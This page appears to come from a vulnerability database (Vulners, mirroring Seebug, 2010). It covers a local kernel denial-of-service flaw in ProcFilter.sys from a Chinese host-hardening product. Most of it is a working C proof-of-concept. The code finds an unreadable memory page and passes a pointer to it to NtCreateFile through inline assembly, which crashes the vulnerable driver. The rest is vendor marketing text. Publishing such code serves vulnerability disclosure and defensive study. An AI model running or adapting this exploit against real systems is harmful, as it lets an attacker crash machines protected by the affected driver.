Lucene search
K

中嘉华诚内核加固免疫系统单机版1.2.01 ProcFilter.sys 本地内核拒绝服务漏洞

🗓️ 05 Aug 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 53 Views

中嘉华诚内核加固免疫系统单机版1.2.01 ProcFilter.sys本地内核拒绝服务漏洞利用代

Code

                                                漏洞利用代码:


#include "stdafx.h"
#include "windows.h"
#include "winternl.h"
int main(int argc, char* argv[])
{
printf("GKR ProcFilter.sys <= 2009.8.7 Local D.O.S Vuln POC\n"
   "Press Enter\n");


getchar();
ULONG i ;


for (i = 0x1000 ; i < 0x7fff0000 ; i+=0x1000)
{
   if (IsBadReadPtr((PVOID)i , 1))
   {
    break ; 
   }
}
printf("bad page :%08x\n",i);

OBJECT_ATTRIBUTES oba ; 
UNICODE_STRING uniname ;

oba.ObjectName = &uniname;
uniname.Length = 0x24 ; 
uniname.Buffer = (PWSTR)i;
PVOID proc = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtCreateFile");

__asm
{
   push 0
   push 0 
   push 0
   push 0 
   push 0 
   push 0
   push 0
   push 0
   push 0
   lea eax , oba
   push eax
   push 0x40000102
   push 0 
   call proc 
}

return 0;
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation